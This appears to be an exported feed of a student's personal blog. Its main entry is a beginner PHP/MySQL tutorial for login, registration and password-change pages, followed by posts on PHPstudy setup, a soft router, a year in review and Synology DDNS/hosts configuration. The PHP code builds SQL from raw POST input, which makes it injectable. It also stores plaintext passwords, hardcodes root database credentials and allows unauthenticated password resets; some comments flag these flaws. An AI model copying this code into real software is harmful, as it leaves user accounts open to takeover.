href="http://terry906.top">Terry Zhang</a>. 
All rights reserved</p><br></div><br><!-- //copyright --><br><ul class="w3lsg-bubbles"><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br><li></li><br></ul><br></div><br><!-- //main --><br></body><br><br></html><br>//登录.php<br><?php<br> $username = $_POST['Username'];<br> $password = $_POST['Password'];<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf8');<br> //look up the user (NOTE: $username and $password are spliced straight into the SQL text, so this query is injectable; bind them with a prepared statement instead)<br> $chks = "select username,password from obj_message where username='$username' and password='$password'";<br> $result = mysqli_query($conn,$chks);<br> if(mysqli_num_rows($result) > 0){<br> echo "<script>location.href='登录跳转.html'</script>";<br> }else{<br> echo "<script>alert('用户名或密码错误!');</script>";<br> echo "<script>location.href='index.html'</script>";<br> }<br><br>mysqli_close($conn);<br>//登录成功.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>登录页面(样例)</title><br></head><br><body><br> <div>恭喜您,登录成功!</div><br><br> <ul class="nav"><br> <li><br> <a href="#">我的</a><br> <ol><br> <li><a href="#">个人中心</a></li><br> <li><a href="#">积分</a></li><br> <li><a href="index.html">注销</a></li><br> </ol><br> </li><br> </ul><br> <script><br> var nav=document.querySelector('.nav');<br> var lis=nav.children;<br> for(var i=0;i<lis.length;i++){<br> lis[i].onmouseover=function (){<br> this.children[i].style.display='block';<br> }<br> lis[i].onmouseout=function (){<br> this.children[i].style.display='none';<br> }<br> }<br> </script><br></body><br></html><br>//登录跳转.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" 
content="width=device-width, initial-scale=1.0"><br> <title>登录跳转页(样例)</title><br> <style><br> .sp{font-size: 50px;}<br> </style><br></head><br><body><br> <span><img src="正确.png" width="60px"/></span><br> <span class="sp"></span><br> <script><br> var sp=document.querySelector('.sp');<br> var timer=5;<br> setInterval(function(){<br> if(timer==0){<br> location.href='登录成功.html';<br> }else{<br> sp.innerHTML='<strong>登录成功!您将在'+timer+'秒钟跳转!</strong>';<br> timer--;<br> }<br> },1000);<br> </script><br></body><br></html><br></code></pre></td></tr></table></figure><p>2.注册</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span 
class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//注册.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>注册页面(样例)</title><br></head><br><body><br> <h1 align="center">注册账号</h1><br> <form action="注册信息.php" method="post"><br> 用户名:<input type="text" value="请输入用户名" id="username" name="username" required/><br><br> 密码:<input type="text" value="请输入6-16位密码" id="pwd1" name="password" required/><br><br> 确认密码:<input type="text" value="请再次输入" id="pwd2" name="repassword" required/><br><br> <script><br> var pwd1=document.getElementById('pwd1');<br> var pwd2=document.getElementById('pwd2');<br> var username=document.getElementById('username');<br> var flag1=0;<br> var flag2=0;<br> username.onfocus=function(){<br> if(username.value==='请输入用户名'){<br> username.value='';<br> }<br> username.style.color='#333';//onfocus fires when the field gains focus; #333 is black<br> }<br> username.onblur=function(){<br> if(username.value===''){<br> username.value='请输入用户名';<br> }<br> username.style.color='#999';//onblur fires when the field loses focus; #999 is grey<br> }<br> pwd1.onfocus=function(){<br> if(pwd1.value==='请输入6-16位密码'){<br> pwd1.value='';<br> pwd1.type='password';<br> }<br> pwd1.style.color='#333';<br> }<br> pwd2.onfocus=function(){<br> 
if(pwd2.value==='请再次输入'){<br> pwd2.value='';<br> pwd2.type='password';<br> }<br> pwd2.style.color='#333';<br> }<br> </script><br> <input type="submit" value="注册" id="zc"><br> <script><br> var zc=document.getElementById('zc');<br> zc.addEventListener('click',function(){<br> location.href="index.html";<br> })<br> </script><br> </form><br><br></body><br></html><br>//注册跳转.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br> <title>注册跳转页(样例)</title><br> <style><br> .sp{font-size: 50px;}<br> </style><br></head><br><body><br><span><img src="正确.png" width="60px"/></span><br><span class="sp"></span><br><script><br> var sp=document.querySelector('.sp');<br> var timer=5;<br> setInterval(function(){<br> if(timer==0){<br> location.href='index.html';<br> }else{<br> sp.innerHTML='<strong>注册成功!您将在'+timer+'秒钟跳转!</strong>';<br> timer--;<br> }<br> },1000);<br></script><br></body><br></html><br>//注册信息.php<br><?php<br> $username=$_POST['username'];<br> $password=$_POST['password'];<br> $repassword=$_POST['repassword'];<br> if($password!=$repassword)<br> {<br> echo "<script>alert('两次密码不一致!')</script>";<br> exit();<br> }<br> $arr=$_POST;<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf8');<br> $chk = "select username from obj_message where username = '$username'"; //same table the insert below writes to; the original queried a non-existent "user" table<br> $result = mysqli_query($conn,$chk);<br> if(mysqli_num_rows($result) > 0)<br> {<br> echo "<script>alert(\"该用户名已被注册\");</script>";<br> exit();<br> }<br> $sql="insert into obj_message set username='$_POST[username]',password='$_POST[password]',repassword='$_POST[repassword]'"; //stores the plaintext password and is injectable through $_POST<br> $check=mysqli_query($conn,$sql);<br> if($check)<br> {<br> echo "<script>location.href='注册跳转.html';</script>";<br> }<br> else<br> {<br> echo "<script>location.href='#';</script>";<br> }<br> mysqli_close($conn);<br></code></pre></td></tr></table></figure><p>Oh, I almost forgot the password change page:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//修改密码.html<br><!DOCTYPE html><br><html lang="zh-CN"><br><head><br> <meta charset="UTF-8"><br> <title>修改密码(样例)</title><br></head><br><body><br><h1>修改密码</h1><br><br> <form action="修改密码.php" method="POST"><br> 用户名:<input type="text" name="usernames" required /><br><br> 修改密码:<input type="password" name="cgpwd" required /><br><br> 确认密码:<input type="password" name="recgpwd" required /><br><br> <input type="submit" value="修改" id="change" /><br> </form><br> <br></body><br></html><br>//修改密码.php<br><?php<br> $usernames=$_POST['usernames'];<br> $cgpwd=$_POST['cgpwd'];<br> $recgpwd=$_POST['recgpwd'];<br> if($cgpwd!=$recgpwd)<br> {<br> echo "<script>alert('两次输入的新密码不一致!');</script>";<br> exit();<br> }<br> $conn=mysqli_connect("127.0.0.1","root","12345678");<br> if(!$conn){<br> die("数据库连接失败!");<br> }<br> mysqli_select_db($conn,"www_test_com");<br> mysqli_set_charset($conn,'utf8');<br>//look up the user<br> $chkss = "select username from obj_message where username='$usernames'";<br> $results = mysqli_query($conn,$chkss);<br> if(mysqli_num_rows($results) > 0){<br> ;<br> }else{<br> echo "<script>alert('该用户名不存在!');</script>";<br> echo "<script>location.href='index.html';</script>"; exit(); //stop here, otherwise the update below still runs<br> }<br> $sqls="update obj_message set password='$_POST[cgpwd]',repassword='$_POST[recgpwd]' where username='$_POST[usernames]'"; //NOTE: nothing proves the requester owns this account; a real reset needs the old password or an emailed token<br> $qs=mysqli_query($conn,$sqls);<br> if($qs)<br> {<br> echo "<script>alert('修改成功!');</script>";<br> echo "<script>location.href='index.html';</script>";<br> }<br> else<br> {<br> echo "<script>alert('修改失败!');</script>";<br> echo "<script>location.href='#';</script>";<br> }<br> mysqli_close($conn);<br></code></pre></td></tr></table></figure><p>P.S. Since I tested on PHPstudy, the IP address is always 127.0.0.1; if MySQL is not on the local machine, use the MySQL server's IP instead! root and 12345678 in the code are the database account and password, which will differ for you!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>Closing remarks</h2><p>In the end I realised that the PHP code that connects to the database could be put in a file of its own and pulled into the other pages with the file-inclusion functions (for example <code>include()</code>, <code>require()</code>), which would cut down the amount of code. The "remember me" box on the home page is fake; I think it could be implemented with a session in the future.</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Front-end</tag>
</tags>
</entry>
<entry>
<title>Building a Local Site with PHPstudy</title>
<link href="/2021/04/04/PHPstudy%E6%9C%AC%E5%9C%B0%E5%BB%BA%E7%AB%99/"/>
<url>/2021/04/04/PHPstudy%E6%9C%AC%E5%9C%B0%E5%BB%BA%E7%AB%99/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>After two weeks of study, I have finally finished the web front-end (HTML5, JavaScript) part and the back-end (PHP, MySQL) part. Over this period I have learned to build a login and registration page on my own and submit its contents to a MySQL database. Below I will walk through the whole process of building the login and registration pages in detail.</p><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>Preparation</h2><p>For beginners I do not recommend renting or buying a virtual host (VPS) to practise building websites, because setting up the environment is fairly complex and hard for newcomers to understand. Instead we can download PHPstudy on our own computer to build the site locally, deploy a WAMP (Windows + Apache + MySQL + PHP) environment with one click, and use a virtual domain name to simulate a website environment.</p><p>First, go to the PHPstudy official site and download the xiaopi panel (小皮面板). After downloading, click the "Start" button next to WAMP to install the environment. Once installation is complete, click "Websites" in the left sidebar.</p><p><img src="https://s2.loli.net/2022/09/16/CaVSj7RLeuko4HE.png" alt="img"></p><p>Then fill in a www-prefixed address in the "Domain" field; here www.test.com is used as the example. After filling in the address, tick "Create database" and set the username and password.</p><p><img src="https://s2.loli.net/2022/09/16/BH6TULFwRIXtOl3.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/16/23SqfcMVgL9nIUx.png" alt="img"></p><p>Once that is ready, go to the "phpstudy_pro" folder on your computer, find the folder named after the domain you just defined under the "WWW" subfolder, and copy your already-created web page folder into it. I will cover the creation of the login and registration pages later.</p><p><img src="https://s2.loli.net/2022/09/16/cgIMYaHmfUZkPw7.png" alt="img"></p><p>Double-click "Physical path" under "Websites" in PHPstudy and select the web folder you copied in. Note that the web files must include a file named index.html; otherwise you need to change "Site homepage" under "Manage" > "Modify" before you can see the page you made.</p><p><img src="https://s2.loli.net/2022/09/16/gjsM2db9c84JNlF.png" alt="img"></p><p>Go to "Software management" to download and install the database management tool SQL-Front. I recommend it for beginners because it has a graphical interface. Of course, you can also use Navicat, but the genuine version is paid.</p><p><img src="https://s2.loli.net/2022/09/16/5nkIqYtPm1iTa3C.png" alt="img"></p><p>After opening it, click "New" to create a login profile.</p><p><img src="https://s2.loli.net/2022/09/16/Iigj29aocAqeX6G.png" alt="img"></p><p>Fill in the default local IP, 127.0.0.1, in the "host" field, then select the database you just created below.</p><p><img src="https://s2.loli.net/2022/09/16/lVwT1IrHzoDdfyA.png" alt="img"></p><p>Once inside, double-click the database you just created, move the cursor over it and right-click "New" > "Table"; the following window pops up.</p><p><img src="https://s2.loli.net/2022/09/16/Q96ast75VfPKo2b.png" alt="img"></p><p>Following the same pattern, create the corresponding fields for storing the data.</p><p><img src="https://s2.loli.net/2022/09/16/pmhEPaXDBrqjgCN.png" alt="img"></p><p>With that, the database preparation is complete. In the next article I will describe in detail how the source code for the login and registration pages is written. Thank you all for your support!</p><h2 id="SQLfront报错"><a href="#SQLfront报错" class="headerlink" title="SQLfront报错"></a>SQL-Front errors</h2><p>While creating the database I ran into some unexpected situations, for example error 1055 shown below.</p><p><img src="https://s2.loli.net/2022/09/16/EDlvpc6Gt42fd5J.png" alt="img"></p><p>Solution: in the "Extensions" subdirectory of the "PHPstudy_pro" folder, find the folder corresponding to MySQL and open the my.ini file inside it with Notepad.</p><p><img src="https://s2.loli.net/2022/09/16/Uw9MADmCXEjJdhL.png" alt="img"></p><p>Add the statement shown in the box under [mysqld], save, and restart PHPstudy.</p><p><img src="https://s2.loli.net/2022/09/16/9e8tfc7b2yozusT.png" alt="img"></p><p>Open SQL-Front again and the error no longer appears!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>Closing Remarks</h2><p>Thank you for reading patiently; if you have any questions, please leave a comment!</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Front-end</tag>
</tags>
</entry>
<entry>
<title>R2S Soft Router Unboxing & First Impressions</title>
<link href="/2021/01/26/R2S%E8%BD%AF%E8%B7%AF%E7%94%B1%E5%BC%80%E7%AE%B1-%E5%88%9D%E4%BD%93%E9%AA%8C/"/>
<url>/2021/01/26/R2S%E8%BD%AF%E8%B7%AF%E7%94%B1%E5%BC%80%E7%AE%B1-%E5%88%9D%E4%BD%93%E9%AA%8C/</url>
<content type="html"><![CDATA[<p>Disclosure: this article is purely experience sharing, with no sponsorship of any kind! Please contact the author for permission before reposting and include a link to this article! The images were lost during the blog migration; my apologies!</p><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>A while ago I saw Dongdong's video on YouTube recommending this R2S in every way, and I quietly became interested. I happened to be moving to a new home, so I planned to buy it as a bypass router for proxy access and ad blocking, and my old Netgear R7000 would be honourably retired as an AP. In the end I couldn't resist and bought this soft router from Dongdong's Taobao store. P.S. Since I bought the fully-equipped version, I didn't need to flash the firmware myself (honestly, I just couldn't be bothered).</p><h2 id="开箱"><a href="#开箱" class="headerlink" title="开箱"></a>Unboxing</h2><p>Opening the box, there are only three things: the soft router itself, a charger and a USB 2.0 card reader. Simple and clear.</p><p>Looking closely at the R2S: 1 LAN port (converted from USB 3.0), 1 WAN port, and a Type-C power port.</p><p>Below is the other side, where you can see the SD card that came pre-inserted.</p><h2 id="初体验"><a href="#初体验" class="headerlink" title="初体验"></a>First Impressions</h2><p>Without further ado, let's connect a computer and look at its admin page.</p><p>First enter 192.168.2.1 or 192.168.22.1 in the browser (it varies with the firmware); the default password is password.</p><p>After logging in, let's look at the main interface. As you can see, it has quite a lot of features.</p><p>Next, the file upload page (here I uploaded the OpenWrt version of the AdGuard Home plugin).</p><p>Let's look at the bundled software (apart from AdGuard Home, which I installed myself, everything else came with the firmware).</p><p><strong>I will write a dedicated article later on how to set up AdGuard Home (OpenWrt version)!</strong></p><p>This soft router also supports multi-WAN multi-dial (I really doubt whether this ARM CPU and the Realtek NIC can keep up!)</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>Closing Remarks</h2><p>That's it for the first look; after moving I'll come back to set up the bypass router. If you have questions, leave a comment!</p><p>Update 2022/1/6: Since this soft router's proxy performance was too poor, I have sold it on the second-hand market! ARM just isn't up to it!</p>]]></content>
<categories>
<category>Network Operations</category>
</categories>
<tags>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>2020 Year in Review</title>
<link href="/2021/01/24/2020%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/"/>
<url>/2021/01/24/2020%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>The past few weeks were exam weeks and I was busy revising, with no time to update the blog. Now that the holidays are here, let me write (ahem, pad out) a post, heh!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main Text</h2><p>At last we bid farewell to 2020, a year of ups and downs, of sorrow and joy. It was a year full of challenges and also full of opportunities; this year some people rejoiced and some grieved; some gained and some lost. In the rush, the time to say goodbye has finally come. Goodbye, 2020, the year that made us unhappy; hello, 2021, full of hope!<br>2020 was destined to be an extraordinary year. As a Wuhan native, I felt the impact of the COVID-19 pandemic on my life all the more keenly: the gaokao papers were made easier, which led to my underperforming on the exam; online teaching had little effect, which made me long to return to campus; during the lockdown of Wuhan I was stuck in my hometown for more than 40 days... Yet besides the blows, the pandemic also helped me find a goal worth fighting for: becoming a network/information security engineer. In the summer after the gaokao I learned to assemble a desktop PC myself, learned to tinker with smart routers and flash them with all kinds of third-party firmware, and learned to set up my own private cloud server; after starting university I not only learned to edit video with Premiere and make subtitles with Arctime Pro, but also learned to build my own personal blog with WordPress. Looking back at 2020, there was the disappointment of the gaokao and also the pride of winning honours, such as a national first prize in the National English Competition for College Students and an Excellence Award in the Alibaba Cloud website design contest (starting from zero, after all)...<br>Looking back at the first half of the year, I lived in a slump; looking back at the second half, my life found its light. With the help of seniors from other colleges, my university life gradually got on track. The first time making a female friend, the first time going out with a girl, the first time taking part in volunteer work... so many firsts. I got to know a lot of interesting people; although they were not from all over the country as I had imagined, it still made me very happy. Even though I did not get into my ideal university, knowing these people makes me feel life is worth it!</p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>Closing Remarks</h2><p>I hope that in the new year 2021 I can get my driver's licence, pass the CET-4, do well again in the MCM/ICM, and I also wish that my roommates and I all find partners! What's past is prologue; 2021, let's go for it together!</p>]]></content>
<categories>
<category>Life Snippets</category>
</categories>
</entry>
<entry>
<title>Configuring DNSPod DDNS on a Synology NAS for External Access</title>
<link href="/2020/12/23/%E7%BE%A4%E6%99%96NAS%E9%85%8D%E7%BD%AEDNSPodDDNS%E5%AE%9E%E7%8E%B0%E5%A4%96%E7%BD%91%E8%AE%BF%E9%97%AE/"/>
<url>/2020/12/23/%E7%BE%A4%E6%99%96NAS%E9%85%8D%E7%BD%AEDNSPodDDNS%E5%AE%9E%E7%8E%B0%E5%A4%96%E7%BD%91%E8%AE%BF%E9%97%AE/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>This article explains in detail how to use the Synology NAS's built-in DDNS feature to perform dynamic DNS resolution with Tencent Cloud DNSPod. I will use a domain bought from Alibaba Cloud as the example.</p><h2 id="设置你的域名DNS服务器到DNSPod"><a href="#设置你的域名DNS服务器到DNSPod" class="headerlink" title="设置你的域名DNS服务器到DNSPod"></a>Point your domain's DNS servers to DNSPod</h2><p>Log in to the Alibaba Cloud console, search for "Domain console" in the search box, click your domain and change its DNS servers (mine had already been changed) to:</p><figure class="highlight stylus"><table><tr><td class="code"><pre><code class="hljs stylus">f1g1ns1.dnspod.net<br>f1g1ns2.dnspod.net<br></code></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/16/jBdlwh9EH1Ksqa2.png" alt="img"></p><h2 id="设置域名解析"><a href="#设置域名解析" class="headerlink" title="设置域名解析"></a>Set up DNS resolution</h2><p>Register with DNSPod and log in (you can also log in directly with a Tencent Cloud account).</p><p>DNSPod website: <a href="https://www.dnspod.cn/">https://www.dnspod.cn/</a></p><p>Go to domain resolution, add a domain, and enter the domain:</p><p><img src="https://s2.loli.net/2022/09/16/UuSO8yTfmnMIhNz.png" alt="img"></p><p>Go to the management console and click "DNS resolution":</p><p><img src="https://s2.loli.net/2022/09/16/TlZJwFUSoLtNdu6.png" alt="img"></p><p>Click your domain, add a record, and set an A record for your domain pointing to any IP (0.0.0.0):</p><p>Go to "Key management" and click "Create key":</p><p><img src="https://s2.loli.net/2022/09/16/mW6ojpl2QeFCEKP.png" alt="img"></p><p>Copy and save the generated ID and token:</p><p><img src="https://s2.loli.net/2022/09/16/EuHNOPWCo58ywr3.png" alt="img"></p><p><strong>The token is shown only once, at creation time; copy and save it right away!</strong></p><h2 id="配置群晖DDNS"><a href="#配置群晖DDNS" class="headerlink" title="配置群晖DDNS"></a>Configure Synology DDNS</h2><p>Click "External Access" in "Control Panel":</p><p><img src="https://s2.loli.net/2022/09/16/WHyu7lXDBrCpvwb.png" alt="img"></p><p>Under "DDNS" choose "Add":</p><p><img src="https://s2.loli.net/2022/09/16/muhqBA7rnWbxlQk.png" alt="img"></p><p>For the service provider select DNSPod.cn:</p><p><img src="https://s2.loli.net/2022/09/16/8FkzRgC5N6o4jSW.png" alt="img"></p><p>Enter the domain (starting with www), fill in the ID you just created as the username and the token as the password, then click OK:</p><p><img src="https://s2.loli.net/2022/09/16/Fer1cl9RVzJo8WZ.png" alt="img"></p><p>Once resolution succeeds, the status shows "Normal".</p><p>Restart the router so that the public IP changes.</p><p>The Synology detects the new IP and notifies the service provider to update where the domain points, so resolution is maintained.</p><h2 id="配置路由器端口"><a href="#配置路由器端口" class="headerlink" title="配置路由器端口"></a>Configure router ports</h2><p>Configure port forwarding on the router so that the Synology DSM ports can be reached from outside.</p><h3 id="查询或修改群晖DSM端口-本文以5000-x2F-5001为例"><a href="#查询或修改群晖DSM端口-本文以5000-x2F-5001为例" class="headerlink" title="查询或修改群晖DSM端口(本文以5000/5001为例)"></a>Check or change the Synology DSM ports (this article uses 5000/5001)</h3><p>In Control Panel select "Network" and open it:</p><p><img src="https://s2.loli.net/2022/09/16/QbGcdgqUa2jnfoE.png" alt="img"></p><p>DSM default ports: HTTP is 5000, HTTPS is 5001.</p><p><img src="https://s2.loli.net/2022/09/16/NQJB2ERgqLGIZ45.png" alt="img"></p><h3 id="登录路由器配置端口转发(这里以梅林固件路由器为例)"><a href="#登录路由器配置端口转发(这里以梅林固件路由器为例)" class="headerlink" title="登录路由器配置端口转发(这里以梅林固件路由器为例)"></a>Log in to the router and configure port forwarding (a Merlin firmware router is used as the example)</h3><p>Add DSM's HTTP and HTTPS ports to the Synology's LAN IP, select the TCP protocol, fill in the fields as shown below, click the plus sign at the end, then click "Apply" at the bottom.</p><p>P.S. Some router models need a restart after saving before the change takes effect; if the DSM default ports were changed, use the changed port numbers here.</p><p><img src="https://s2.loli.net/2022/09/16/aMC4nNXyxWPphAT.png" alt="img"></p><p>Configuration complete; you can now access the Synology NAS from outside via your domain! However, this alone does not let you reach the NAS by domain from inside the LAN. For LAN access, see my other post:</p><p><a href="https://hackerterry.netlify.app/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/">https://hackerterry.netlify.app/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/</a></p><h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>Closing Remarks</h2><p>Thank you for reading patiently; if you have any questions, please leave a comment below!</p>]]></content>
<categories>
<category>Network Operations</category>
</categories>
<tags>
<tag>Tutorial</tag>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>Editing hosts on a Merlin Firmware Router So the LAN Can Reach Synology DSM by Domain Name</title>
<link href="/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/"/>
<url>/2020/12/21/%E6%A2%85%E6%9E%97%E5%9B%BA%E4%BB%B6%E8%B7%AF%E7%94%B1%E5%99%A8%E4%BF%AE%E6%94%B9hosts%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E9%80%9A%E8%BF%87%E5%9F%9F%E5%90%8D%E8%AE%BF%E9%97%AE%E7%BE%A4%E6%99%96dsm/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>I recently bought a Synology NAS, the discontinued DS218play (because I am broke), and began the long process of a newbie fumbling around. Since I live on campus most of the time, I wanted to access the Synology DSM at home via a domain name for various things, such as mapping a drive over the internet, but then I found that inside the LAN the domain could not be used to reach DSM! After a long search, this newbie actually succeeded! Here is the exact method, which needs neither PuTTY nor SecureCRT!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main Text</h2><p>First download WinSCP from the web; after installing it looks like this:</p><p><img src="https://s2.loli.net/2022/09/14/iQrxMAhg5B9W2cl.jpg" alt="img"></p><p>Choose the SCP protocol; the host name is the IP of your router's admin page, and the username and password are the same ones used to log in to the router admin page; just connect. Leave the port unchanged, fill everything in and click Login, as shown:</p><p><img src="https://s2.loli.net/2022/09/14/41uNsDa2AlK37Cy.jpg" alt="img"></p><p>Once connected, go back up to the router's root directory, enter the /jffs/configs directory, create a new file named dnsmasq.conf.add and write the following into it: <code>addn-hosts=/jffs/configs/hosts</code></p><p>You write it just as you would edit a txt file on Windows; note that the file name is exactly dnsmasq.conf.add.</p><p>Then create another file named hosts and write the following into it (my Synology NAS LAN IP is 192.168.50.66):</p><figure class="highlight accesslog"><table><tr><td class="code"><pre><code class="hljs accesslog">192.168.50.66 www.xxx.xxx<br><br># e.g.: 192.168.2.164 smartplugconnect.phicomm.com<br></code></pre></td></tr></table></figure><p>After adding both files, choose "Yes" in the dialog that pops up, then restart the router. Then, from any computer on the LAN (preferably a different one), ping your domain from the Windows command prompt or PowerShell; if the NAS's LAN IP comes back, it worked!</p>]]></content>
<categories>
<category>Network Operations</category>
</categories>
<tags>
<tag>Tutorial</tag>
<tag>Gadget Tinkering</tag>
</tags>
</entry>